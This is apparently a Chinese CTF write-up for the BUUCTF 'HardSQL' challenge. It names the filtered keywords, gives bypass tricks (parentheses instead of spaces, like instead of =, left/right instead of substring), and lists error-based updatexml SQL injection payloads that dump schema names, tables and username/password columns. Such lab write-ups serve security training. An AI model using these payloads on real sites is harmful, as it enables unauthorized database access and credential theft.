题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL![BUUCTF:[极客大挑战 2019]HardSQL_q](https://s2.51cto.com/images/blog/202306/19154640_649007e0702ef28464.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[极客大挑战 2019]HardSQL_q_02](https://s2.51cto.com/images/blog/202306/19154640_649007e093bb413192.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
使用Burpfuzz测试过滤了哪些关键字
![BUUCTF:[极客大挑战 2019]HardSQL_q_03](https://s2.51cto.com/images/blog/202306/19154640_649007e0bd61b66795.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
过滤了空格、=、substring、mid等字符
Trick
- 使用
()代替空格 - 使用
like代替= - 使用
right、left代替substring、mid
注入过程如下
1'or(1)like(2)%23
1'or(updatexml('~',concat('~',database(),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(left(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(right(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(group_concat(id,'~',username,'~',password))from(geek.H4rDsq1)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(right(group_concat(id,'~',username,'~',password),30))from(geek.H4rDsq1)),'~'),'~'))%23![BUUCTF:[极客大挑战 2019]HardSQL_q_04](https://s2.51cto.com/images/blog/202306/19154640_649007e0d649332605.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
